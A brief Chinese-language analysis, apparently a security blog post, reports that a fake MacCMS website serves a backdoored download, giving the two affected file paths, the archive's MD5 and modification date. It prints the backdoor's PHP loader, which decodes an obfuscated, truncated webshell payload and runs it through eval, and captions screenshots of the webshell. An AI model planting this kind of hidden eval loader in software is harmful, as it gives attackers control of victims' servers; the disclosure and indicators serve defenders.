www.maccmsv10.com前者使用了一个和maccms官网一模一样的静态首页提供程序下载
该第三方站点下载了源码,至今依然存在后门,所以基本可确信是故意搭建的假冒官网。
后门文件路径
- u200bmaccms10extendupyunsrcUpyunApiFormat.php
- u200bmaccms10extendQcloudSmsSms.php
MD5 (maccms10.zip) = 099e02dfa9d283e2891bce5bf9691643
最后修改日期都是:2019/6/12
<?php
error_reporting(E_ERROR);
@ini_set(‘display_errors’,‘Off’);
@ini_set(‘max_execution_time’,20000);
@ini_set(‘memory_limit’,‘256M’);
header(“content-Type: text/html; charset=utf-8”);
$password = “0d41c75e2ab34a3740834cdd7e066d90”;
function s(){
$str = “66756r6374696s6r207374…………”; //大马
$str = str_rot13($str);
m($str);
}
function m($str){
global $password;
$jj = ”;
eval($jj.pack(‘H*’,$str).$jj);
}
s();
?>
MacCMS后门Webshell
登录后主界面